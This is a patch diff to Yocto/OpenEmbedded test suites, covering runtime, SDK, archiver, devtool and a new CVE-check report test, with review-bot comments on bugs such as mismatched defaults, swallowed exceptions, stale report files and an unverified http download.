+ (status, output) = self.target.run('export DISPLAY=:0 && xdotool key F2 && xdotool mousemove 100 100')
+ return self.assertEqual(status, 0, msg = 'Failed to simulate keyboard/mouse input event, output : %s' % output)
+
+ def set_suspend(self):
+ (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
+ return self.assertEqual(status, 0, msg = 'Failed to suspends your system to RAM, output : %s' % output)
+
+ @OEHasPackage(['xdotool'])
+ @skipIfQemu('qemuall', 'Test only runs on real hardware')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_USB_Hid_input(self):
+ self.keyboard_mouse_simulation()
+ self.set_suspend()
+ self.keyboard_mouse_simulation()
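Review bot: The test declares only `xdotool` through OEHasPackage, yet `set_suspend` also needs `sudo` and `rtcwake` on the target, so an image without them fails the test instead of skipping it; add the packages that provide them to the guard. `set_suspend` is a copy of the method in suspend.py, and a shared helper would keep the two in step. `return self.assertEqual(...)` returns None, so the `return` keyword can be dropped in both helpers.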
diff --git a/meta/lib/oeqa/runtime/context.py b/meta/lib/oeqa/runtime/context.py
index 3826f27642..8a0dbd0736 100644
--- a/meta/lib/oeqa/runtime/context.py
+++ b/meta/lib/oeqa/runtime/context.py
@@ -5,6 +5,7 @@
#
import os
+import sys
from oeqa.core.context import OETestContext, OETestContextExecutor
from oeqa.core.target.ssh import OESSHTarget
@@ -66,11 +67,11 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
% self.default_target_type)
runtime_group.add_argument('--target-ip', action='store',
default=self.default_target_ip,
- help="IP address of device under test, default: %s" \
+ help="IP address and optionally ssh port (default 22) of device under test, for example '192.168.0.7:22'. Default: %s" \
% self.default_target_ip)
runtime_group.add_argument('--server-ip', action='store',
default=self.default_target_ip,
- help="IP address of device under test, default: %s" \
+ help="IP address of the test host from test target machine, default: %s" \
% self.default_server_ip)
runtime_group.add_argument('--host-dumper-dir', action='store',
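Review bot: The `--server-ip` help text reports `self.default_server_ip`, but the argument is declared two lines above with `default=self.default_target_ip`, so the documented default and the effective one differ unless the two attributes happen to be equal. If the help text is right, the declaration should read `default=self.default_server_ip,`. The `--target-ip` help now advertises an optional `:port` suffix; this hunk does not show whether consumers that use the value as a bare address strip it first, which is worth confirming.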
@@ -119,8 +120,7 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
# XXX: Don't base your targets on this code it will be refactored
# in the near future.
# Custom target module loading
- target_modules_path = kwargs.get('target_modules_path', '')
- controller = OERuntimeTestContextExecutor.getControllerModule(target_type, target_modules_path)
+ controller = OERuntimeTestContextExecutor.getControllerModule(target_type)
target = controller(logger, target_ip, server_ip, **kwargs)
return target
@@ -130,15 +130,15 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
# AttributeError raised if not found.
# ImportError raised if a provided module can not be imported.
@staticmethod
- def getControllerModule(target, target_modules_path):
- controllerslist = OERuntimeTestContextExecutor._getControllerModulenames(target_modules_path)
+ def getControllerModule(target):
+ controllerslist = OERuntimeTestContextExecutor._getControllerModulenames()
controller = OERuntimeTestContextExecutor._loadControllerFromName(target, controllerslist)
return controller
# Return a list of all python modules in lib/oeqa/controllers for each
# layer in bbpath
@staticmethod
- def _getControllerModulenames(target_modules_path):
+ def _getControllerModulenames():
controllerslist = []
@@ -153,9 +153,8 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
else:
raise RuntimeError("Duplicate controller module found for %s. Layers should create unique controller module names" % module)
- extpath = target_modules_path.split(':')
- for p in extpath:
- controllerpath = os.path.join(p, 'lib', 'oeqa', 'controllers')
+ for p in sys.path:
+ controllerpath = os.path.join(p, 'oeqa', 'controllers')
if os.path.exists(controllerpath):
add_controller_list(controllerpath)
return controllerslist
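Review bot: Controller discovery now walks every entry of `sys.path`, so any directory on the interpreter's import path that contains `oeqa/controllers` contributes modules that are later imported. That can include an empty-string entry, for which `os.path.join(p, 'oeqa', 'controllers')` resolves relative to the current working directory. If only layer-provided `lib` directories are intended, skip non-absolute entries with `if not os.path.isabs(p): continue`, or at least add a comment saying that layers are expected to be on `sys.path` already. `_getControllerModulenames` starts outside this hunk.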
@@ -175,16 +174,12 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
# Search for and return a controller or None from given module name
@staticmethod
def _loadControllerFromModule(target, modulename):
- obj = None
- # import module, allowing it to raise import exception
- module = __import__(modulename, globals(), locals(), [target])
- # look for target class in the module, catching any exceptions as it
- # is valid that a module may not have the target class.
try:
- obj = getattr(module, target)
- except:
- obj = None
- return obj
+ import importlib
+ module = importlib.import_module(modulename)
+ return getattr(module, target)
+ except AttributeError:
+ return None
@staticmethod
def readPackagesManifest(manifest):
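Review bot: `importlib.import_module(modulename)` now sits inside the `try`, so an AttributeError raised while the controller module itself is being imported is reported as "this module has no such controller" and the real fault is hidden. Keep the import outside the guard and let `getattr` supply the default: `module = importlib.import_module(modulename)` followed by `return getattr(module, target, None)`. `import importlib` would also read better at the top of the file next to `import sys`.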
diff --git a/meta/lib/oeqa/sdk/cases/buildepoxy.py b/meta/lib/oeqa/sdk/cases/buildepoxy.py
index 385f8ccca8..f69f720cd6 100644
--- a/meta/lib/oeqa/sdk/cases/buildepoxy.py
+++ b/meta/lib/oeqa/sdk/cases/buildepoxy.py
@@ -17,7 +17,7 @@ class EpoxyTest(OESDKTestCase):
"""
def setUp(self):
if not (self.tc.hasHostPackage("nativesdk-meson")):
- raise unittest.SkipTest("GalculatorTest class: SDK doesn't contain Meson")
+ raise unittest.SkipTest("EpoxyTest class: SDK doesn't contain Meson")
def test_epoxy(self):
with tempfile.TemporaryDirectory(prefix="epoxy", dir=self.tc.sdk_dir) as testdir:
diff --git a/meta/lib/oeqa/selftest/cases/archiver.py b/meta/lib/oeqa/selftest/cases/archiver.py
index bc5447d2a3..6a5c8ec71e 100644
--- a/meta/lib/oeqa/selftest/cases/archiver.py
+++ b/meta/lib/oeqa/selftest/cases/archiver.py
@@ -35,11 +35,11 @@ class Archiver(OESelftestTestCase):
src_path = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['TARGET_SYS'])
# Check that include_recipe was included
- included_present = len(glob.glob(src_path + '/%s-*' % include_recipe))
+ included_present = len(glob.glob(src_path + '/%s-*/*' % include_recipe))
self.assertTrue(included_present, 'Recipe %s was not included.' % include_recipe)
# Check that exclude_recipe was excluded
- excluded_present = len(glob.glob(src_path + '/%s-*' % exclude_recipe))
+ excluded_present = len(glob.glob(src_path + '/%s-*/*' % exclude_recipe))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % exclude_recipe)
def test_archiver_filters_by_type(self):
@@ -67,11 +67,11 @@ class Archiver(OESelftestTestCase):
src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
# Check that target_recipe was included
- included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipe))
+ included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipe))
self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipe)
# Check that native_recipe was excluded
- excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipe))
+ excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipe))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipe)
def test_archiver_filters_by_type_and_name(self):
@@ -104,17 +104,17 @@ class Archiver(OESelftestTestCase):
src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
# Check that target_recipe[0] and native_recipes[1] were included
- included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[0]))
+ included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[0]))
self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipes[0])
- included_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[1]))
+ included_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[1]))
self.assertTrue(included_present, 'Recipe %s was not included.' % native_recipes[1])
# Check that native_recipes[0] and target_recipes[1] were excluded
- excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[0]))
+ excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[0]))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipes[0])
- excluded_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[1]))
+ excluded_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[1]))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % target_recipes[1])
diff --git a/meta/lib/oeqa/selftest/cases/bblayers.py b/meta/lib/oeqa/selftest/cases/bblayers.py
index f131d9856c..7d74833f61 100644
--- a/meta/lib/oeqa/selftest/cases/bblayers.py
+++ b/meta/lib/oeqa/selftest/cases/bblayers.py
@@ -12,6 +12,11 @@ from oeqa.selftest.case import OESelftestTestCase
class BitbakeLayers(OESelftestTestCase):
+ def test_bitbakelayers_layerindexshowdepends(self):
+ result = runCmd('bitbake-layers layerindex-show-depends meta-poky')
+ find_in_contents = re.search("openembedded-core", result.output)
+ self.assertTrue(find_in_contents, msg = "openembedded-core should have been listed at this step. bitbake-layers layerindex-show-depends meta-poky output: %s" % result.output)
+
def test_bitbakelayers_showcrossdepends(self):
result = runCmd('bitbake-layers show-cross-depends')
self.assertIn('aspell', result.output)
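Review bot: The new test uses `re.search` plus `assertTrue` for a plain substring, while the neighbouring test uses `assertIn`; `self.assertIn('openembedded-core', result.output, msg=...)` is simpler and prints both operands on failure. The command presumably queries the layer index over the network, so the test will fail on hosts that cannot reach it. A comment above the `runCmd` call saying so would help whoever triages such a failure.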
diff --git a/meta/lib/oeqa/selftest/cases/bbtests.py b/meta/lib/oeqa/selftest/cases/bbtests.py
index dc423ec439..0b88316950 100644
--- a/meta/lib/oeqa/selftest/cases/bbtests.py
+++ b/meta/lib/oeqa/selftest/cases/bbtests.py
@@ -148,9 +148,6 @@ INHERIT_remove = \"report-error\"
self.delete_recipeinc('man-db')
self.assertEqual(result.status, 1, msg="Command succeded when it should have failed. bitbake output: %s" % result.output)
self.assertIn('Fetcher failure: Unable to find file file://invalid anywhere. The paths that were searched were:', result.output)
- line = self.getline(result, 'Fetcher failure for URL: \'file://invalid\'. Unable to fetch URL from any source.')
- self.assertTrue(line and line.startswith("ERROR:"), msg = "\"invalid\" file \
-doesn't exist, yet fetcher didn't report any error. bitbake output: %s" % result.output)
def test_rename_downloaded_file(self):
# TODO unique dldir instead of using cleanall
@@ -160,7 +157,7 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
""")
self.track_for_cleanup(os.path.join(self.builddir, "download-selftest"))
- data = 'SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"'
+ data = 'SRC_URI = "https://downloads.yoctoproject.org/mirror/sources/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"'
self.write_recipeinc('aspell', data)
result = bitbake('-f -c fetch aspell', ignore_status=True)
self.delete_recipeinc('aspell')
@@ -188,6 +185,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
self.assertTrue(find, "No version returned for searched recipe. bitbake output: %s" % result.output)
def test_prefile(self):
+ # Test when the prefile does not exist
+ result = runCmd('bitbake -r conf/prefile.conf', ignore_status=True)
+ self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified prefile didn't exist: %s" % result.output)
+ # Test when the prefile exists
preconf = os.path.join(self.builddir, 'conf/prefile.conf')
self.track_for_cleanup(preconf)
ftools.write_file(preconf ,"TEST_PREFILE=\"prefile\"")
@@ -198,6 +199,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
self.assertIn('localconf', result.output)
def test_postfile(self):
+ # Test when the postfile does not exist
+ result = runCmd('bitbake -R conf/postfile.conf', ignore_status=True)
+ self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified postfile didn't exist: %s" % result.output)
+ # Test when the postfile exists
postconf = os.path.join(self.builddir, 'conf/postfile.conf')
self.track_for_cleanup(postconf)
ftools.write_file(postconf , "TEST_POSTFILE=\"postfile\"")
diff --git a/meta/lib/oeqa/selftest/cases/buildoptions.py b/meta/lib/oeqa/selftest/cases/buildoptions.py
index e91f0bd18f..b1b9ea7e55 100644
--- a/meta/lib/oeqa/selftest/cases/buildoptions.py
+++ b/meta/lib/oeqa/selftest/cases/buildoptions.py
@@ -57,15 +57,15 @@ class ImageOptionsTests(OESelftestTestCase):
class DiskMonTest(OESelftestTestCase):
def test_stoptask_behavior(self):
- self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
res = bitbake("delay -c delay", ignore_status = True)
self.assertTrue('ERROR: No new tasks can be executed since the disk space monitor action is "STOPTASKS"!' in res.output, msg = "Tasks should have stopped. Disk monitor is set to STOPTASK: %s" % res.output)
self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
- self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
res = bitbake("delay -c delay", ignore_status = True)
self.assertTrue('ERROR: Immediately abort since the disk space monitor action is "ABORT"!' in res.output, "Tasks should have been aborted immediatelly. Disk monitor is set to ABORT: %s" % res.output)
self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
- self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
res = bitbake("delay -c delay")
self.assertTrue('WARNING: The free space' in res.output, msg = "A warning should have been displayed for disk monitor is set to WARN: %s" %res.output)
diff --git a/meta/lib/oeqa/selftest/cases/cve_check.py b/meta/lib/oeqa/selftest/cases/cve_check.py
new file mode 100644
index 0000000000..22ffeffd29
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/cve_check.py
@@ -0,0 +1,220 @@
+import json
+import os
+from oeqa.selftest.case import OESelftestTestCase
+from oeqa.utils.commands import bitbake, get_bb_vars
+
+class CVECheck(OESelftestTestCase):
+
+ def test_version_compare(self):
+ from oe.cve_check import Version
+
+ result = Version("100") > Version("99")
+ self.assertTrue( result, msg="Failed to compare version '100' > '99'")
+ result = Version("2.3.1") > Version("2.2.3")
+ self.assertTrue( result, msg="Failed to compare version '2.3.1' > '2.2.3'")
+ result = Version("2021-01-21") > Version("2020-12-25")
+ self.assertTrue( result, msg="Failed to compare version '2021-01-21' > '2020-12-25'")
+ result = Version("1.2-20200910") < Version("1.2-20200920")
+ self.assertTrue( result, msg="Failed to compare version '1.2-20200910' < '1.2-20200920'")
+
+ result = Version("1.0") >= Version("1.0beta")
+ self.assertTrue( result, msg="Failed to compare version '1.0' >= '1.0beta'")
+ result = Version("1.0-rc2") > Version("1.0-rc1")
+ self.assertTrue( result, msg="Failed to compare version '1.0-rc2' > '1.0-rc1'")
+ result = Version("1.0.alpha1") < Version("1.0")
+ self.assertTrue( result, msg="Failed to compare version '1.0.alpha1' < '1.0'")
+ result = Version("1.0_dev") <= Version("1.0")
+ self.assertTrue( result, msg="Failed to compare version '1.0_dev' <= '1.0'")
+
+ # ignore "p1" and "p2", so these should be equal
+ result = Version("1.0p2") == Version("1.0p1")
+ self.assertTrue( result ,msg="Failed to compare version '1.0p2' to '1.0p1'")
+ # ignore the "b" and "r"
+ result = Version("1.0b") == Version("1.0r")
+ self.assertTrue( result ,msg="Failed to compare version '1.0b' to '1.0r'")
+
+ # consider the trailing alphabet as patched level when comparing
+ result = Version("1.0b","alphabetical") < Version("1.0r","alphabetical")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' < '1.0r'")
+ result = Version("1.0b","alphabetical") > Version("1.0","alphabetical")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' > '1.0'")
+
+ # consider the trailing "p" and "patch" as patched released when comparing
+ result = Version("1.0","patch") < Version("1.0p1","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0' < '1.0p1'")
+ result = Version("1.0p2","patch") > Version("1.0p1","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0p2' > '1.0p1'")
+ result = Version("1.0_patch2","patch") < Version("1.0_patch3","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0_patch2' < '1.0_patch3'")
+
+
+ def test_convert_cve_version(self):
+ from oe.cve_check import convert_cve_version
+
+ # Default format
+ self.assertEqual(convert_cve_version("8.3"), "8.3")
+ self.assertEqual(convert_cve_version(""), "")
+
+ # OpenSSL format version
+ self.assertEqual(convert_cve_version("1.1.1t"), "1.1.1t")
+
+ # OpenSSH format
+ self.assertEqual(convert_cve_version("8.3_p1"), "8.3p1")
+ self.assertEqual(convert_cve_version("8.3_p22"), "8.3p22")
+
+ # Linux kernel format
+ self.assertEqual(convert_cve_version("6.2_rc8"), "6.2-rc8")
+ self.assertEqual(convert_cve_version("6.2_rc31"), "6.2-rc31")
+
+
+ def test_recipe_report_json(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("m4-native -c cve_check")
+
+ def check_m4_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "m4-native")
+ found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
+ self.assertIn("CVE-2008-1687", found_cves)
+ self.assertEqual(found_cves["CVE-2008-1687"], "Patched")
+
+ self.assertExists(summary_json)
+ check_m4_json(summary_json)
+ self.assertExists(recipe_json)
+ check_m4_json(recipe_json)
+
+
+ def test_image_json(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_DIR", "CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ report_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ print(report_json)
+ try:
+ os.remove(report_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("core-image-minimal-initramfs")
+ self.assertExists(report_json)
+
+ # Check that the summary report lists at least one package
+ with open(report_json) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertGreater(len(report["package"]), 1)
+
+ # Check that a random recipe wrote a recipe report to deploy/cve/
+ recipename = report["package"][0]["name"]
+ recipe_report = os.path.join(vars["CVE_CHECK_DIR"], recipename + "_cve.json")
+ self.assertExists(recipe_report)
+ with open(recipe_report) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ self.assertEqual(report["package"][0]["name"], recipename)
+
+
+ def test_recipe_report_json_unpatched(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+CVE_CHECK_REPORT_PATCHED = "0"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("m4-native -c cve_check")
+
+ def check_m4_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "m4-native")
+ #m4 had only Patched CVEs, so the issues array will be empty
+ self.assertEqual(package["issue"], [])
+
+ self.assertExists(summary_json)
+ check_m4_json(summary_json)
+ self.assertExists(recipe_json)
+ check_m4_json(recipe_json)
+
+
+ def test_recipe_report_json_ignored(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+CVE_CHECK_REPORT_PATCHED = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "logrotate_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("logrotate -c cve_check")
+
+ def check_m4_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "logrotate")
+ found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
+ # m4 CVE should not be in logrotate
+ self.assertNotIn("CVE-2008-1687", found_cves)
+ # logrotate has both Patched and Ignored CVEs
+ self.assertIn("CVE-2011-1098", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1098"], "Patched")
+ self.assertIn("CVE-2011-1548", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1548"], "Ignored")
+ self.assertIn("CVE-2011-1549", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1549"], "Ignored")
+ self.assertIn("CVE-2011-1550", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1550"], "Ignored")
+
+ self.assertExists(summary_json)
+ check_m4_json(summary_json)
+ self.assertExists(recipe_json)
+ check_m4_json(recipe_json)
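Review bot: In test_recipe_report_json, test_recipe_report_json_unpatched and test_recipe_report_json_ignored both `os.remove()` calls share one `try`, so when `summary_json` is absent the `FileNotFoundError` skips the removal of `recipe_json`. A per-recipe report left by an earlier run then survives, and if the cve_check task does not rewrite it (not determinable from this file) the assertions would be checking stale CVE status data. Removing each file independently closes that gap. Separately, the helper in the logrotate test is still called `check_m4_json`, which is misleading next to the "m4 CVE should not be in logrotate" assertion.

```python
# … unchanged: write_config() and get_bb_vars() lookups …
for stale_report in (summary_json, recipe_json):
    try:
        os.remove(stale_report)
    except FileNotFoundError:
        pass
# … unchanged: bitbake(... -c cve_check) and the report assertions …
```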
diff --git a/meta/lib/oeqa/selftest/cases/devtool.py b/meta/lib/oeqa/selftest/cases/devtool.py
index d8bf4aea08..9efe342a0d 100644
--- a/meta/lib/oeqa/selftest/cases/devtool.py
+++ b/meta/lib/oeqa/selftest/cases/devtool.py
@@ -8,6 +8,7 @@ import shutil
import tempfile
import glob
import fnmatch
+import unittest
import oeqa.utils.ftools as ftools
from oeqa.selftest.case import OESelftestTestCase
@@ -38,6 +39,13 @@ def setUpModule():
canonical_layerpath = os.path.realpath(canonical_layerpath) + '/'
edited_layers.append(layerpath)
oldmetapath = os.path.realpath(layerpath)
+
+ # when downloading poky from tar.gz some tests will be skipped (BUG 12389)
+ try:
+ runCmd('git rev-parse --is-inside-work-tree', cwd=canonical_layerpath)
+ except:
+ raise unittest.SkipTest("devtool tests require folder to be a git repo")
+
result = runCmd('git rev-parse --show-toplevel', cwd=canonical_layerpath)
oldreporoot = result.output.rstrip()
newmetapath = os.path.join(corecopydir, os.path.relpath(oldmetapath, oldreporoot))
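Review bot: The bare `except:` around `git rev-parse --is-inside-work-tree` turns every failure into a module-wide skip, including `KeyboardInterrupt` and errors unrelated to "not a git repo", such as a missing git binary. The whole devtool suite can then drop out of a CI run without anyone noticing. Catch the exception type that `runCmd` raises on a non-zero exit (not visible in this hunk, so confirm it), or at minimum use `except Exception as e:` and include `e` in the skip message so the reason is recorded. The body of setUpModule starts and ends outside the hunk.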
@@ -57,7 +65,7 @@ def setUpModule():
if relpth.endswith('/'):
destdir = os.path.join(corecopydir, relpth)
# avoid race condition by not copying .pyc files YPBZ#13421,13803
- shutil.copytree(pth, destdir, ignore=ignore_patterns('*.pyc', '__pycache__'))
+ shutil.copytree(pth, destdir, ignore=shutil.ignore_patterns('*.pyc', '__pycache__'))
else:
destdir = os.path.join(corecopydir, os.path.dirname(relpth))
bb.utils.mkdirhier(destdir)
@@ -269,7 +277,7 @@ class DevtoolAddTests(DevtoolBase):
self.track_for_cleanup(tempdir)
pn = 'pv'
pv = '1.5.3'
- url = 'http://www.ivarch.com/programs/sources/pv-1.5.3.tar.bz2'
+ url = 'http://downloads.yoctoproject.org/mirror/sources/pv-1.5.3.tar.bz2'
result = runCmd('wget %s' % url, cwd=tempdir)
result = runCmd('tar xfv %s' % os.path.basename(url), cwd=tempdir)
srcdir = os.path.join(tempdir, '%s-%s' % (pn, pv))
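Review bot: The new mirror URL is still plain `http://`, and the next two lines `wget` the tarball and unpack it with `tar` with no checksum comparison visible in between. The integrity of the archive that later gets built therefore rests on the network path alone. The bbtests hunk in this same commit already uses `https://downloads.yoctoproject.org/mirror/sources/...`, so the line can be `url = 'https://downloads.yoctoproject.org/mirror/sources/pv-1.5.3.tar.bz2'`. The enclosing test starts and ends outside the hunk, so a later verification step cannot be ruled out from here.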
@@ -340,7 +348,7 @@ class DevtoolAddTests(DevtoolBase):
checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263'
checkvars['S'] = '${WORKDIR}/git'
checkvars['PV'] = '0.1+git${SRCPV}'
- checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https'
+ checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https;branch=master'
checkvars['SRCREV'] = srcrev
checkvars['DEPENDS'] = set(['dbus'])
self._test_recipe_contents(recipefile, checkvars, [])
@@ -442,6 +450,7 @@ class DevtoolAddTests(DevtoolBase):
tempdir = tempfile.mkdtemp(prefix='devtoolqa')
self.track_for_cleanup(tempdir)
url = 'gitsm://git.yoctoproject.org/mraa'
+ url_branch = '%s;branch=master' % url
checkrev = 'ae127b19a50aa54255e4330ccfdd9a5d058e581d'
testrecipe = 'mraa'
srcdir = os.path.join(tempdir, testrecipe)
@@ -462,7 +471,7 @@ class DevtoolAddTests(DevtoolBase):
checkvars = {}
checkvars['S'] = '${WORKDIR}/git'
checkvars['PV'] = '1.0+git${SRCPV}'
- checkvars['SRC_URI'] = url
+ checkvars['SRC_URI'] = url_branch
checkvars['SRCREV'] = '${AUTOREV}'
self._test_recipe_contents(recipefile, checkvars, [])
# Try with revision and version specified
@@ -481,7 +490,7 @@ class DevtoolAddTests(DevtoolBase):
checkvars = {}
checkvars['S'] = '${WORKDIR}/git'
checkvars['PV'] = '1.5+git${SRCPV}'
- checkvars['SRC_URI'] = url
+ checkvars['SRC_URI'] = url_branch
checkvars['SRCREV'] = checkrev
self._test_recipe_contents(recipefile, checkvars, [])
@@ -693,7 +702,44 @@ class DevtoolModifyTests(DevtoolBase):
self.assertTrue(bbclassextended, 'None of these recipes are BBCLASSEXTENDed to native - need to adjust testrecipes list: %s' % ', '.join(testrecipes))
self.assertTrue(inheritnative, 'None of these recipes do "inherit native" - need to adjust testrecipes list: %s' % ', '.join(testrecipes))
+ def test_devtool_modify_localfiles_only(self):
+ # Check preconditions
+ testrecipe = 'base-files'
+ src_uri = (get_bb_var('SRC_URI', testrecipe) or '').split()
+ foundlocalonly = False
+ correct_symlink = False
+ for item in src_uri:
+ if item.startswith('file://'):
+ if '.patch' not in item:
+ foundlocalonly = True
+ else:
+ foundlocalonly = False
+ break
+ self.assertTrue(foundlocalonly, 'This test expects the %s recipe to fetch local files only and it seems that it no longer does' % testrecipe)
+ # Clean up anything in the workdir/sysroot/sstate cache
+ bitbake('%s -c cleansstate' % testrecipe)
+ # Try modifying a recipe
+ tempdir = tempfile.mkdtemp(prefix='devtoolqa')
+ self.track_for_cleanup(tempdir)
+ self.track_for_cleanup(self.workspacedir)
+ self.add_command_to_tearDown('bitbake -c clean %s' % testrecipe)
+ self.add_command_to_tearDown('bitbake-layers remove-layer */workspace')
+ result = runCmd('devtool modify %s -x %s' % (testrecipe, tempdir))
+ srcfile = os.path.join(tempdir, 'oe-local-files/share/dot.bashrc')
+ srclink = os.path.join(tempdir, 'share/dot.bashrc')
+ self.assertExists(srcfile, 'Extracted source could not be found')
+ if os.path.islink(srclink) and os.path.exists(srclink) and os.path.samefile(srcfile, srclink):
+ correct_symlink = True
+ self.assertTrue(correct_symlink, 'Source symlink to oe-local-files is broken')
+ matches = glob.glob(os.path.join(self.workspacedir, 'appends', '%s_*.bbappend' % testrecipe))
+ self.assertTrue(matches, 'bbappend not created')
+ # Test devtool status
+ result = runCmd('devtool status')
+ self.assertIn(testrecipe, result.output)
+ self.assertIn(tempdir, result.output)
+ # Try building
+ bitbake(testrecipe)
def test_devtool_modify_git(self):
# Check preconditions
@@ -843,7 +889,7 @@ class DevtoolUpdateTests(DevtoolBase):
self._check_repo_status(os.path.dirname(recipefile), expected_status)
